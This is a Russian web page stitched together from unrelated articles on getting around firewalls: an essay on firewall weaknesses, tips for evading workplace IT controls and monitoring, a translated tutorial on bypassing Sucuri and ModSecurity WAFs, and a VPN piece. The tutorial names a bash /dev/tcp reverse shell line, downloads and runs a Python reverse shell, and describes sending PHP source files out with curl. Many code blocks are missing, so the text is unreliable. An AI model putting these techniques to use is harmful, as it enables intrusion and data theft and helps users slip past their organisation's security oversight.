Как обойти межсетевой экран на работе

Обновлено: 04.07.2024

Как известно, межсетевые экраны, как и другие средства защиты, настраиваются людьми. А людям свойственно ошибаться, даже специалистам по защите информации. Именно этот факт и используется многими злоумышленниками.

Достаточно найти всего лишь одну слабину в настройках межсетевого экрана и все, можно считать, что "ваше дело табак". Это подтверждается и различными исследованиями.

"Нормальные герои всегда идут в обход"

Зачем пытаться проникнуть к защищаемым ресурсам через защитные средства, когда можно попытаться обойти их? Это можно проиллюстрировать примером из смежной области. В среду, 21 февраля 1990 г. Мэри Пирхем, аналитик по бюджету одной американской компании, пришла на работу. Однако она не смогла пройти на свое рабочее место даже после набора четырехзначного кода и произнесения кодового слова в системе контроля доступа. Желая все - таки попасть на работу, Мэри обошла здание и открыла дверь черного хода при помощи пилки для ногтей и пластмассовой расчески.

Новейшая защитная система, которую обошла Мэри Пирхем, рекламировалась как "безотказная и надежная" и стоила несколько десятков тысяч долларов. Аналогично и с межсетевыми экранами, только роль черного хода может выполнять модем. Знаете ли вы, сколько в вашей сети установлено модемов и для чего они используются? Не отвечайте сразу утвердительно, подумайте. При обследовании одной сети начальники отдела защиты информации и автоматизации рвали на себе рубаху, утверждая, что они знают все до единого модема, установленные в их сети.

Запустив систему анализа защищенности Internet Scanner, мы действительно обнаружили указанные ими модемы, используемые для обновления баз данных бухгалтерской и юридической систем. Однако было обнаружено и два неизвестных модема.

Один использовался сотрудником аналитического отдела с целью получения доступа к рабочим каталогам из дома. Второй модем использовался для доступа в Internet, в обход межсетевого экрана.

С возможностью обхода МСЭ связан и другой пример. Не всегда угрозы идут только с внешней стороны МСЭ, из сети Internet.

Большое количество потерь связано как раз с инцидентами защиты со стороны внутренних пользователей (по статистике - до 80 % инцидентов исходят изнутри). Необходимо уточнить, что межсетевой экран только просматривает трафик на границах между внутренней сетью и сетью Internet. Если трафик, использующий "бреши" в защите, никогда не проходит через межсетевой экран, то МСЭ и не находит никаких проблем. В 1985 году на одном из российских судостроительных заводов была разоблачена преступная группа из свыше 70 (!) человек, которая в течение 1981 - 1985 гг. путем введения в информационную систему расчета зарплаты фальшивых документов похитила более 200 тыс. рублей.

Аналогичные случаи были зафиксированы на заводах г. Ленинграда и г. Горького. Ни один, даже самый эффективный межсетевой экран, не смог бы обнаружить такую деятельность.

Туннели используются не только в метро

Но даже просмотр трафика на границе между внешней и внутренней сетями не гарантирует полной защиты. Межсетевой экран фильтрует трафик и принимает решения о пропуске или блокировании сетевых пакетов, опираясь на информацию об используемом протоколе. Как правило, правила предусматривают соответствующую проверку с целью определения того, разрешен или нет конкретный протокол.

Если межсетевой экран разрешает прохождение SMTP - трафика (а мне не приходилось видеть МСЭ, который бы этого не делал), то во внутреннюю сеть может попасть и "вирусная инфекция".

Приведу более сложный пример. Например, Web - сервер, функционирующий под управлением программного обеспечения компании Microsoft (Internet Information Server), защищается межсетевым экраном, на котором разрешен только 80 - ый порт. На первый взгляд обеспечивается полная защита. Но только на первый взгляд. Если используется IIS версии 3.0, то обращение по адресу:

позволяет злоумышленнику получить доступ к содержимому ASP - файла, который может хранить конфиденциальные данные (например, пароль доступа к базе данных).

В системе обнаружения атак RealSecure эта атака получила название "HTTP IIS 3.0 Asp Dot". И даже, если вы установили самую последнюю версию IIS 5.0, то и в этом случае вы не можете чувствовать себя в полной безопасности. Обращение к адресу:

приводит к выполнению команды "dir C:\". Аналогичным образом можно прочитать любой файл, в том числе и содержащий конфиденциальную информацию:

Последним примером может служить атака Loki, которая позволяет туннелировать различные команды (например, запрос на передачу файла паролей /etc/passwd) в запросы ICMP Echo Request и реакцию на них в ответы ICMP Echo Reply.

Шифруй, не шифруй, все равно.

Очень часто из уст многих отечественных разработчиков средств VPN можно услышать, что разработанное им средство построения виртуальных частных сетей способно решить многие проблемы безопасности. Они упирают на то, что раз защищаемая сеть общается со своими оппонентами (удаленными офисами, партнерами, заказчиками и т. д.) только по VPN - соединению, то никакая "зараза" в нее не проникнет.

Отчасти это так, но только при условии, что и оппоненты также ни с кем не общаются по незащищенным каналам. А это уже представить себе трудно. И поскольку большинство организаций используют шифрование для защиты внешних сетевых соединений, интерес злоумышленника будет направлен к тем местам в сети, где информация, представляющая для него интерес, вероятно, не является защищенной, то есть к узлам или сетям, с которым установлены доверенные отношения. И даже в случае создания VPN - соединений между сетью, защищаемой при помощи МСЭ с функциями VPN, и доверенной сетью, злоумышленник сможет с той же эффективностью реализовывать свои атаки.

Мало того, эффективность его атак будет еще выше, поскольку зачастую требования по безопасности к доверенным узлам и сетям намного ниже всех остальных узлов. Злоумышленник сможет проникнуть в доверенную сеть, а уж затем из нее осуществлять свои несанкционированные действия по отношению к цели своей атаки.

И вновь о подмене

Подмена адреса - это способ сокрытия реального адреса злоумышленника. Однако он может использоваться и для обхода защитных механизмов межсетевого экрана. Такой простейший способ, как замена адреса источника сетевых пакетов на адрес из защищаемой сети, уже не может ввести в заблуждение современные межсетевые экраны. Все они используют различные способы защиты от такой подмены. Однако сам принцип подмены адреса остается по - прежнему актуальным. Например, злоумышленник может подменить свой реальный адрес на адрес узла, у которого установлены доверенные отношения с атакуемой системой и реализовать атаку типа "отказ в обслуживании" на нее.

Межсетевой экран - как цель атаки

Межсетевые экраны часто сами являются объектами атаки. Атаковав МСЭ и выведя его из строя, злоумышленники могут спокойно, не боясь быть обнаруженными, реализовывать свои преступные замысли по отношению к ресурсам защищаемой сети.

Например, с начала 2001 года было обнаружено немало уязвимостей в реализации различных известных межсетевых экранов. Например, неправильная обработка TCP - пакетов с флагом ECE в МСЭ ipfw или ip6fw позволяла удаленному злоумышленнику обойти созданные правила. Еще одна уязвимость была обнаружена в межсетевом экране BorderWare Firewall Server 6.1.2. Использование данной уязвимости, связанной с широковещательной посылкой запросов ICMP Echo Request, приводила к нарушению доступности МСЭ BorderWare.

В стороне не остались и другие межсетевые экраны - Cisco Secure Pix Firewall, WatchGuard Firebox и т. д.

Стой, кто идет? Предъявите паспорт!

Абсолютное большинство межсетевых экранов построено на классических моделях разграничения доступа, разработанных в 70 - х, 80 - х годах прошлого столетия в военных ведомствах. Согласно этим моделям субъекту (пользователю, программе, процессу или сетевому пакету) разрешается или запрещается доступ к какому - либо объекту (например, файлу или узлу сети) при предъявлении некоторого уникального, присущего только этому субъекту, элемента. В 80 % случаев этим элементом является пароль. В других случаях таким уникальным элементом является таблетка Touch Memory, Smart или Proximity Card, биометрические характеристики пользователя и т. д. Для сетевого пакета таким элементом являются адреса или флаги, находящиеся в заголовке пакета, а также некоторые другие параметры.

Можно заметить, что самым слабым звеном этой схемы является уникальный элемент. Если нарушитель каким - либо образом получил этот самый элемент и предъявил межсетевому экрану, то он воспринимает его, как "своего" и разрешает действовать в рамках прав того субъекта, секретным элементом которого несанкционированно воспользовались. При современных темпах развития технологий получить доступ к такому секретному элементу не составляет большого труда.

Его можно "подслушать" при передаче по сети при помощи анализаторов протоколов, в том числе и встроенных в операционные системы (например, Network Monitor в Windows NT 4.0). Его можно подобрать при помощи специальных программ, доступных в Internet, например, при помощи L0phtCrack для Windows или Crack для Unix.

Т. о. даже самый мощный и надежный межсетевой экран не защитит от проникновения в корпоративную сеть нарушителя, если последний смог подобрать или украсть пароль авторизованного пользователя. Мало того, межсетевой экран даже не зафиксирует нарушения, так как для него нарушитель, укравший пароль, является авторизованным пользователем.

Например, 22 марта 1995 г. неустановленный злоумышленник при помощи украденного пароля и программного обеспечения Пинского филиала БелАКБ "Магнатбанк" проник в компьютерную сеть Белорусского межбанковского расчетного центра и перевел на расчетный счет ООО "Арэса ЛТД" в Советское отделение БелАКБ "Промстройбанк" 1 млрд. 700 млн. рублей.

Администратор - бог и царь

В каждой организации есть пользователи, обладающие практически неограниченными правами в сети. Это сетевые администраторы. Они никому неподконтрольны и могут делать в сети практически все, что угодно. Как правило, они используют свои неограниченные права для выполнения своих функциональных обязанностей. Но представьте на минуту, что администратор чем - то обижен. Будь - то низкой зарплатой, недооценкой его возможностей, местью и т. п.

Известны случаи, когда такие обиженные администраторы "портили кровь" не одной компании и приводили к очень серьезному ущербу. Осенью 1985 года директор по компьютерной безопасности компании USPA & IRA Дональд Берлисон попытался через руководство компании добиться снижения суммы налога на прибыль, которую ему постоянно приходилось выплачивать, и чем он был недоволен.

Однако он был уволен. Через три дня после увольнения он пришел на работу и, получив доступ в сеть компании, удалил 168000 записей базы данных о страховании и защите торговых сделок. Затем он запустил в сеть несколько программ - червей, которые должны были продолжать удалять аналогичные записи в будущем. И Россия не осталась в стороне.

В 1991 г. при помощи компьютерной техники произошло хищение валютных средств из Внешэкономбанка на сумму 125,5 тыс. долларов и подготовка к хищению еще свыше 500 тыс. долларов. Механизм хищения был очень прост. Житель Москвы совместно с начальником отдела автоматизации неторговых операций ВЦ Внешэкономбанка открыл по шести поддельным паспортам счета и внес на них по 50 долларов. Затем, путем изменения банковского программного обеспечения на открытые счета были переведены 125 тысяч долларов, которые и были получены по поддельным паспортам.

Два этих примера демонстрируют, что даже самый эффективный межсетевой экран не смог бы защитить корпоративную сеть, если бы на нее совершил нападение ее администратор.

Межсетевые экраны не обеспечивают достаточного уровня защищенности корпоративных сетей. Хотя ни в коем случае от них нельзя отказываться. Они помогут обеспечить необходимый, но явно недостаточный, уровень защиты корпоративных ресурсов. Как уже не раз отмечалось, традиционные средства, к которым можно отнести и межсетевые экраны, были построены на основе моделей, разработанных в то время, когда сети не получили широкого распространения и способы атак на эти сети не были так развиты, как сейчас.

Чтобы на должном уровне противодействовать этим атакам, необходимо применение новых технологий. Например, технология обнаружение атак (intrusion detection), которая стала активно развиваться за рубежом и четыре года назад попала в Россию. Эта технология, ярким представителем которой является семейство средств RealSecure компании Internet Security Systems, позволяет эффективно дополнять существующие межсетевые экраны, обеспечивая более высокий уровень защищенности.

Будем откровенны: для многих из нас наш рабочий компьютер представляет собой маленький островок дома вне дома. Наверное, это только справедливо, учитывая, что наш домашний компьютер часто является филиалом офиса вне офиса. Поэтому в перерывах между сочинением отчетов и обдумыванием сводных таблиц с расчетами мы используем свои рабочие компьютеры для своей личной жизни. Мы закупаем продукты ко дню рождения, смотрим смешные клипы на YouTube и переписываемся с друзьями по «аське» или по электронной почте.

И очень часто некоторые вещи легче сделать с помощью потребительских технологий, чем с помощью часто неуклюжих корпоративных технологий — сравните хотя бы почту Gmail с корпоративным почтовым ящиком.

В связи с этим возникает одна проблема: наши работодатели недовольны нашим поведением на рабочем месте. Отчасти потому, что они хотят, чтобы на рабочем месте мы работали. А отчасти они боятся, что то, чем мы занимаемся, ставит под угрозу внутренние сети компании. Поэтому они просят IT-отдел запретить нам тащить свою личную жизнь из дома на работу.

Что же, сказочке конец? Ну нет, не так быстро. Чтобы выяснить, можно ли обойти запреты IT-отдела, мы обратились за советами к экспертам по сетевым ресурсам. А именно, мы попросили их найти 10 главных секретов, которые скрывают от нас люди из IT-отдела. Например, как зайти на заблокированный сайт и не оставить следов, или как общаться в чате в реальном времени, не загружая для этого запрещенную программу.

Однако чтобы все было по-честному, мы обратились также к специалистам по безопасности, чтобы выяснить, чем мы рискуем, совершая эти обходные маневры.

Чтобы оценить риски, мы поговорили с тремя экспертами, которые зарабатывают на жизнь тем, что помогают IT-отделам составлять правила и отслеживать злоумышленников, которые норовят их нарушить. Это Джон Пиронти, главный стратег по информационным угрозам консалтинговой фирмы из Амстердама Getronics, специалист по информационной безопасности из компании PricewaterhouseCoopers Марк Лоубел и специалист по угрозам из компании-производителя защитного программного обеспечения McAfee Крейг Шмугар.

Итак, вот эти 10 секретов, которые скрывает от вас ваш IT-отдел, и опасности, связанные с ними, а также советы, как защитить себя и не потерять работу, когда вы будете применять их на практике.

1. Как отправлять гигантские файлы

Компании могут ограничивать объем данных, которые их сотрудники могут отправлять по почте, по одной простой причине: они хотят избежать перегрузки серверов, которая замедлит их работу. А обращение к руководству с просьбой увеличить ваш лимит на отправляемые файлы может оказаться весьма муторным процессом.

Риск: Поскольку эти сервисные сайты отправляют ваши файлы по интернету, они находятся за пределами контроля компании. Это облегчает задачу коварным хакерам, которые могут перехватить эти файлы в пути.

Как защитить себя: У некоторых из этих сайтов репутация лучше, чем у других. Например, YouSendIt — новая компания, которой руководит бывший глава Adobe Systems и которая финансируется хорошо известными венчурными компаниями. Другие такие сайты предлагают мало сведений о себе и поэтому с большей вероятностью могут проделать брешь в системе безопасности, чем могут воспользоваться хакеры, чтобы похитить вашу информацию.

Если владельцы сайта не очевидны, есть другие ориентиры, по которым можно его оценить. Ищите значки безопасности — в Internet Explorer такой значок выглядит как маленький замочек в нижней части экрана, — которые означают, что данный сайт использует систему кодирования для защиты конфиденциальности информации от посетителей.

2. Как использовать программное обеспечение, которое ваша компания запрещает загружать

Проблема: Многие компании требуют, чтобы сотрудники, прежде чем загружать программы, получали разрешение от IT-отдела. Однако это может быть проблематично, если вы хотите загрузить программу, которую парни из IT занесли в черный список.

Обходной маневр: Существует два легких способа решить эту проблему: найти альтернативу этой программе в интернете или принести программу на внешнем носителе.

Риск: Использование онлайновых сервисов может создать чрезмерную нагрузку для ресурсов компании. А программы на внешних носителях, создают угрозу безопасности. Люди из IT предпочитают держать под контролем программное обеспечение, используемое сотрудниками, чтобы в случае появления вируса или другой проблемы, они могли легко все починить. Если вы приносите программы с собой, степень их контроля снижается.

Надо помнить еще об одном: некоторые менее надежные программы, в особенности программы для обмена файлами, могут быть снабжены шпионским ПО.

Как защитить себя: Если вы приносите программу на внешнем носителе, говорит Лоубел, по крайней мере измените настройки антивирусной программы на вашем рабочем компьютере, чтобы он просканировал устройство на предмет потенциальной угрозы. Это нетрудно сделать, выйдя в меню «настройки» или «опции». Точно так же, если вы пользуетесь файло-обменниками, настройте их так, чтобы другие не могли получить доступ к вашим файлам, тоже через «настройки» или «опции».

3. Как заходить на сайты, заблокированные вашей компанией

Проблема: Компании часто перекрывают своим сотрудникам доступ на определенные сайты — от действительно непристойных (порно-сайты) и вероятно не самых добропорядочных (сайты с азартными играми) до практически невинных (сайты с электронной почтой).

Риск: Если вы пользуетесь прокси-сайтом для просмотра почты или видео-файлов с YouTube, основная опасность, это что вас застукает начальство. Но есть и более серьезные угрозы, связанные с безопасностью. Иногда плохие парни, которые подвизаются в интернете, покупают адреса сайтов, одной-двумя буквами отличающихся от адресов популярных сайтов, и используют их для заражения вирусами компьютеров посетителей, предостерегает Лоубел. Часто компании блокируют и эти сайты — но если вы будете пользоваться прокси, вы окажетесь беззащитны перед ними.

Как защитить себя: Не превращайте использование прокси-сайтов в привычку. Прибегайте к этому способу только для выхода на определенные сайты, доступ на которые ваша компания закрыла в целях повышения продуктивности — например, YouTube. И поаккуратнее с орфографией.

4. Как замести следы на корпоративном ноутбуке

Проблема: Если вы используете принадлежащей компании ноутбук для работы из дома, весьма вероятно, что вы используете его в личных целях: организуете семейный отпуск, закупаете книги для чтения на пляже, составляете фото-альбомы в интернете, и так далее. Многие компании оставляют за собой право отслеживать все, что вы делаете на этом компьютере, потому что технически он является собственностью компании. Что же будет, если. эээ. ваш друг случайно забредет на порно-сайт или будет искать в интернете лекарство от какой-нибудь постыдной болезни?

Обходной маневр: Последние версии браузеров Internet Explorer и Firefox позволяют замести следы. В IE7 выберите Tools, потом Delete Browsing History. Здесь вы сможете либо стереть всю историю своих посещений, выбрав Delete All, либо выбрать несколько ссылок, которые вы хотите стереть. В Firefox просто нажмите Ctrl-Shift-Del или нажмите на Clear Private Data в меню Tools.

Риск: Даже если вы почистите свою историю, свободный интернет-серфинг все равно ставит вас под угрозу. Вы можете непреднамеренно подцепить на каком-нибудь сомнительном сайте шпионское ПО или создать своим поведением юридические проблемы для босса. Если вас поймают, в лучшем случае вам грозит неловкая ситуация, а в худшем — вы рискуете лишиться работы.

Как защитить себя: Как можно чаще подчищайте свои личные данные. Еще лучше не используйте рабочий компьютер ни для чего, о чем вы не хотели бы ставить в известность свое начальство.

5. Как найти рабочие документы из дома

Проблема: Вы доделываете свою работу поздно вечером или в выходные — но документ, который вам нужен, остался на офисном компьютере.

Обходной маневр: Google, Microsoft, Yahoo и IAC/InterActiveCorp предлагают ПО для быстрого поиска документов на рабочем столе компьютера. Кроме того, некоторые из них позволяют с одного компьютера искать документы, сохраненные на рабочем столе другого. Как это работает? Компания-поисковик сохраняет копии ваших документов на своем сервере. Таким образом она можете сканировать эти копии, когда вы осуществляете удаленный поиск.

Риск: Специалисты по корпоративным технологиям воображают катастрофический сценарий: вы сохранили на своем рабочем компьютере крайне секретную финансовую информацию. Установили программу для доступа к этим файлам со своего личного ноутбука. А потом ноутбук потерялся. Ай-ай-ай.

Кроме того, эксперты обнаружили в программе Google для поиска по компьютерам уязвимые места, благодаря которым хакеры могут заставить пользователя предоставить им доступ к файлам, говорит Шмугар из McAfee. (После этого эти проблемные места были исправлены, но там могут оказаться и другие, говорит он.)

Как защитить себя: Если на вашем рабочем компьютере есть файлы, которые не должны ни при каких обстоятельствах оказаться в широком доступе, попросите системного администратора из IT помочь вам установить Google Desktop таким образом, чтобы избежать утечек.

6. Как хранить рабочие файлы в онлайне

Проблема: Помимо поиска на рабочем столе большинство людей, которым часто приходится работать из дома, нашли собственное решение. Они сохраняют рабочие файлы на портативных устройствах или в сети компании, откуда потом забирают их удаленно. Но портативные устройства могут быть слишком громоздкими, а связь с рабочей сетью бывает медленной и ненадежной.

Риск: Плохие парни могут украсть ваш пароль для одного из этих сайтов и заграбастать копии секретных материалов вашей компании.

Как себя защитить: Когда вы собираетесь сохранить в интернете тот или иной файл, спросите себя, что будет, если он окажется в широком доступе или попадет в руки главе компании, являющейся вашим основным конкурентом. Если ничего страшного не произойдет, то продолжайте.

7. Как сохранить тайну личной переписки

Проблема: Многие компании имеют возможность отслеживать электронные письма сотрудников как на рабочем адресе, так и на других электронных адресах, а также общение по ICQ.

Обходной маневр: Когда вы отправляете электронные письма со своего личного электронного ящика или с рабочей почты, вы можете их закодировать так, чтобы их мог прочитать только адресат. В Microsoft Outlook кликните на Tools, потом Options и выберите строку Security.

Сюда вы можете ввести пароль, и никто не сможет открыть письмо, не зная этого пароля. (Людям, которым эти письма предназначены, вы, разумеется, должны сообщить этот пароль заранее.)

Чтобы закодировать свое общение в реальном времени, воспользуйтесь службой Trillian от Cerulean Studios, которая позволяет работать с AOL Instant Messenger, Yahoo Messenger и другими программами общения в реальном времени и помогают кодировать разговоры таким образом, чтобы никто посторонний не мог их прочитать.

Риск: Основная причина, по которой компании отслеживают электронную переписку сотрудников, это чтобы поймать тех, кто передает конфиденциальную информацию. Прибегая ко всем вышеперечисленным уловкам, вы можете спровоцировать ложную тревогу, и усложнить сотрудникам отдела IT борьбу с реальной угрозой.

Как защитить себя: Пользуйтесь описанными методами только время от времени, а не используйте их по умолчанию.

8. Как получить удаленный доступ к рабочей почте, если ваша компания не хочет разоряться на КПК

Проблема: Всем, у кого нет КПК, знакомо это чувство: вы пошли в ресторан пообедать или выпить пива после работы, и вот все полезли в карманы за своими КПК, и только вы в одиночестве вынуждены покачивать в руке стакан.

Обходной маневр: Вы тоже можете поддерживать связь с рабочей почтой, используя различные мобильные устройства. Просто настройте свою рабочую почту так, чтобы письма пересылались вам на личный электронный адрес.

В Microsoft Outlook вы можете сделать это, нажав на правую кнопку мыши при работе с любым письмом, выбрав «Создать правило» и попросив пересылать вам все письма на другой адрес. Потом настройте свой мобильный телефон так, чтобы проверять с его помощью электронную почту, следуя инструкциям от своего провайдера (это та компания, которая посылает вам счета за телефон).

Риск: Теперь хакеры могут взломать не только ваш компьютер, но и ваш телефон.

Как защитить себя: Существует «правильный» способ получить доступ к рабочей почте с помощью различных персональных мобильных устройств, взяв пароль и другую информацию в отделе IT.

9. Как получить доступ к личной почте с рабочего КПК

Проблема: Если ваша компания предоставила вам КПК, вы, вероятно, сталкиваетесь с противоположной проблемой. Вы хотите проверять свою личную почту так же легко, как рабочую.

Обходной маневр: Обратите внимание на раздел «Настройки» своего персонального почтового ящика и убедитесь, что у вас активирован POP (почтовый протокол), используемый для получения почты через другие адреса. Потом зайдите на сайт своего провайдера услуг для КПК BlackBerry. Нажмите на кнопку «Профиль», найдите там раздел Email Accounts («почтовые ящики») и выберите Other Email Accounts («другие почтовые ящики»). Потом нажмите на Add Account («добавить ящик») и введите информацию о своем персональном электронном адресе. Теперь ваша личная почта будет приходить туда же, куда и корпоративная.

Риск: Ваша компания, вероятно, использует целый арсенал средств для обеспечения безопасности и борьбы с вирусами и шпионскими программами. Когда вы получаете на BlackBerry личную почту, она приходит, минуя эти защитные барьеры. Это означает, что шпионский софт или вирусы могут проникнуть в ваш КПК через личную почту, говорит Шмугар из McAfee.

Что еще хуже, говорит он, когда вы подключите BlackBerry к своему рабочему компьютеру, существует вероятность, что этот шпионский софт перенесется на жесткий диск.

Как защитить себя: Скрестите пальцы и уповайте на то, что ваш провайдер электронной почты делает все, что от него зависит, для защиты от вирусов и шпионского ПО (возможно, так оно и есть).

10. Как сделать вид, что вы работаете

Проблема: Вы заняты жизненно важным поиском в интернете, и вдруг у вас за спиной появляется начальник. Ваши действия?

Риск: Хорошая новость: в том, что касается безопасности компании, это ничем не грозит.

Этичный хакинг и тестирование на проникновение, информационная безопасность

Объединение строк в полезной нагрузке для удалённого выполнения команд даёт возможность обойти правила файерволов (Sucuri, ModSecurity)

В первой части техник обхода WAF, мы увидели, как обойти правило WAF используя подстановочные символы и, в частности, знак вопроса, который является одним из примеров подстановочных символов. Очевидно, что существует множество способов обойти набор правил WAF и я думаю каждая атака имеет свои специфичные техники обхода. Например: использование синтаксиса комментирования внутри полезной нагрузки SQL-инъекции может обойти многие фильтры. Я имею ввиду вместо использования union+select вы можете использовать что-то вроде:

Это отличная техника, она также работает когда целевой WAF имеет низкий уровень паранойи, который разрешает астериск (символ звёздочки *) и символ дефиса. Это должно работать только для SQL инъекции и это не может использоваться для эксплуатации Локального внедрения файлов (Local File Inclusion) или Удалённого выполнения команд (Remote Command Execution). В некоторых специфичных сценариях, настоящим «кошмаром» для WAF, которым нужно защищать веб приложения от атак удалённого выполнения команд, является конкатенация (объединение) строк.

Если вы хотите попрактиковаться с некоторыми из этих техник обхода, недавно я (в смысле автор theMiddle) создал FluxCapacitor — крайне уязвимую виртуальную машину на hackthebox. Эта статья не содержит каких либо подсказок для решения определённых сценариев FluxCapacitor, но может улучшить ваши знания об этой технике.

Примечания от меня (MiAl): даже чтобы просто зарегистрироваться, вам понадобятся навыки из статьи «Статический анализ исходного кода веб-сайта в браузере».

Конкатенация (объединение)

Во многих языках программирования, конкатенация строки — это бинарный инфиксный (это означает, что вставляется посередине) оператор. Оператор + (плюс) часто перегружается для обозначения конкатенации строковых аргументов: "Hello, " + "World" имеет значение "Hello, World". В других языках есть отдельный оператор специально для указания неявного преобразования типа в строку, в отличие от более сложного поведения универсального плюса. В качестве примеров можно привести . (точка) в Perl и PHP, .. (две точки) в Lua и так далее. Например:

Но если вы думаете, что это единственный способ объединить строки, вы абсолютно ошибаетесь.

В некоторых языках, таких как C, C++, Python и скриптовых языках / синтаксис которых может быть найден в Bash, есть нечто, называемое конкатенацией строковых литералов (string literal concatenation), что означает, что смежные строковые литералы объединяются без какого-либо оператора: "Hello, " "World" имеет значение "Hello, World". Это работает не только для команд printf и echo, но и для всего синтаксиса bash. Давайте начнём с начала.

Каждая из следующих команд имеет одинаковый результат:

Тесты конкатенации строк используя Bash и Python:


Несколько примеров одних и тех же команд:

Используя конкатенированную строку в качестве аргумента команды cat или как пути до исполнимого файла cat:



Теперь давайте предположим, что вы обнаружили удалённое выполнение команд в параметре url вашего приложения. Если имеется правило, которое блокирует фразы вроде «что-либо, passwd, shadow, что-либо…», вы можете обойти это чем-то вроде такого:

Настало время сделать несколько тестов! Я буду использовать следующий PHP код, чтобы проводить тесты, как и раньше, за защитой Sucuri WAF и ModSecurity. Вероятно, читая этот код вы думаете, что он слишком глупый и простой, и что никто не использует curl внутри функции system() вместо использования функции curl языка PHP… Если вы думаете так, вы живёте в мире, который лучше чем мой! 🙂 Вы удивитесь, как много раз я встречал такого рода вещи в исходном коде реальных производственных приложениях. PHP, который я буду использовать:

Веселье с Sucuri WAF


Теперь много вещей, которые я могу делать, чтобы эксплуатировать это уязвимое приложение. Одна из них — это поломка синтаксиса curl с помощью ; (точки с запятой) и попытка выполнить другие системные команды. Sucuri злится, когда я пытаюсь прочитать файл /etc/passwd… Например:

приводит к блокировке в Sucuri WAF по следующей причине «An attempted RFI/LFI was detected and blocked» (была обнаружена и заблокирована попытка удалённого/локального внедрения файлов). Я думаю (просто предположение, поскольку пользователи не могут видеть подробности правила Sucuri WAF), что правило Sucuri «RFI/LFI Attempt» использует что-то вроде «совпадение фраз» со списком обычных путей и имён файлов, таких как /etc/passwd. Этот WAF имеет очень минималистический набор правил и очень низкий «уровень паранойи», который позволяет мне обойти это правило используя просто две одинарных кавычки!

Обход Sucuri WAF используя две одинарных кавычки:


Я знаю, что вы думаете: «хорошо, ты можешь прочитать файл passwd обойдя все наборы правил WAF…, но реальный, самый большой и самый важный, мать всех вопросов такой: можешь ли ты получить шелл даже если Sucuri WAF активен и защищает ваше приложение?» natürlich да! Единственная проблема, что мы не можем использовать netcat, поскольку она не установлена в целевой контейнер и да: я проверил это используя удалённое выполнение команд 🙂

Самый простой способ (с несколькими специальными символами, которые могут быть заблокированы в WAF), это использовать команду bash -i примерно так: bash -i >& /dev/tcp/1.1.1.1/1337 0>&1, но к сожалению это слишком сложно для обхода всех наборов правил с этой полезной нагрузкой, и это означает, что будет трудно использовать PHP, Perl или Python код чтобы получить его. Sucuri WAF блокирует мои попытки по причине «Obfuscated attack payload detected.» (обнаружена атака с обфусцированной полезной нагрузкой). Круто, не так ли?

Вместо попытки получить шелл отправляя команды напрямую через уязвимый параметр, я могу загрузить обратный шелл Python в директорию с правами записи используя curl или wget. Начнём с подготовки кода python в shell.py:

Шелл загруженный с помощью curl:


Обратный шелл на python через Sucuri WAF:


Окей, Sucuri WAF не блокирует этот запрос, но обычно ModSecurity блокирует подобную хрень 🙂 Если вы хотите быть уверенным, что обойдёте все типы правил «совпадения фраз», вы можете использовать wget + ip-в-длинной-нотации + объединение строки:

Первая команда использует wget для загрузки шелла в /tmp/. Вторая использует chmod чтобы сделать его исполнимым и третья исполняет его. Как вы можете видеть, не указано имя файла в запросе к команде wget, поэтому загруженный файл назван самой wget как index.html. Вы можете изменить содержимое этого файла используя netcat nc записывая заголовки ответа и тело ответа вручную, как-то примерно как это показано на следующем скриншоте.

Теперь самая трудная часть…

Обход ModSecurity и OWASP Core Rule Set

normalizePath: он удаляет множественные слэши, ссылки директории на саму себя и обратные ссылки директории (за исключением начала ввода) из входной строки.

Все попытки эксплуатировать RCE с конкатенированной строкой блокируются правилом 932160, потому что функция трансформации cmdLine:

Хорошо, я не могу прочитать /etc/passwd, но я не отчаиваюсь! OWASP Core Rule Set знает распространённые файлы, пути и команды чтобы заблокировать их, но он не может делать это же самое с исходным кодом целевого приложения. Я не могу использовать символ точка с запятой ; (и это означает, что я не могу поломать синтаксис curl), но я могу использовать curl для эксфильтрации (выцеживания) файлов и отправки их на мой удалённый сервер. Это будет работать с уровнями паранойи от 0 до 3.

В следующем запросе символ @ кодирован в %40:

Эксфильтрация PHP файла с целевого приложения (за ModSecurity) на удалённый сервер:


Всё это не будет работать если цель имеет уровень паранойи установленный на 4, поскольку полезная нагрузка содержит такие символы как тире, слэш и так далее. Хорошая новость в том, что уровень паранойи 4 очень нечасто встречается в рабочей среде.

Обратный слэш — это новая одинарная кавычка 🙂

Эта же техника также работает с использованием символа обратного слэша \. Это не строка с конкатенацией, это просто символ экранирования:

Как сломать брандмауэр

Прежде чем мы узнаем как пройти брандмауэр в вашей системе, во-первых, мы должны знать, что такое брандмауэр. Обычно брандмауэр защищает компьютер от опасных вирусов. Интернет может быть очень темным местом, щелкнув по неправильной ссылке, вы можете добавить кучу опасных вещей на ваш диск данных. Брандмауэр отлично справляется со своей задачей. Но в других случаях это мешает пользователю в полной мере пользоваться услугами, на которые он подписан. Любой не прошедший проверку подлинности сайт считается опасным в глазах брандмауэра. Это может очень раздражать, когда вы посещаете эти сайты, чтобы завершить свое исследование. Именно тогда пользователь начинает думать об обходе системы брандмауэра для доступа к своим любимым веб-сайтам.

Как сломать брандмауэр?

Самое неприятное в этих системах брандмауэра - система никогда не скажет вам, как его отключить, или разрешит ссылки, которые не будут блокироваться в разделе брандмауэра. Операционная система хочет, чтобы вы всегда включали брандмауэр, отключив его, чего они от вас не хотят. Это может показаться ограничительным, но есть и хорошая сторона. Он защищает ваше устройство от любых вечных повреждений, которые могут стереть данные из вашей системы.

Если вам интересно, как пройти через брандмауэр? Тогда не волнуйся; В этой статье есть все решения, которые вам понадобятся для решения вашей проблемы.

Существует множество способов обойти систему брандмауэра, чтобы вернуться к обычному ежедневному просмотру. Вот несколько способов, которыми вы можете достичь именно этого. Если Великая китайская стена не может помешать пользователю получить доступ к веб-сайтам по своему вкусу, есть вероятность, что вы можете сделать это в вашем районе.

№1. Как взломать брандмауэр через VPN (виртуальная частная сеть)

Если вы видели видео YouTube за последние пять лет, значит, вы знали, что такое VPN и что он на самом деле делает с вашим компьютером. Для людей, которые понятия не имеют, что такое VPN? Не беспокойся Мы вас прикрыли. VPN или виртуальная частная сеть позволяет вам создать безопасное соединение с сервером, не выдавая свой IP-адрес. Он защищает ваши сайты от просмотра. VPN наблюдается всплеск популярности среди интернет-пользователей. Из-за повышения ограничений вынуждают людей искать альтернативные маршруты, чтобы наслаждаться их сайтами.

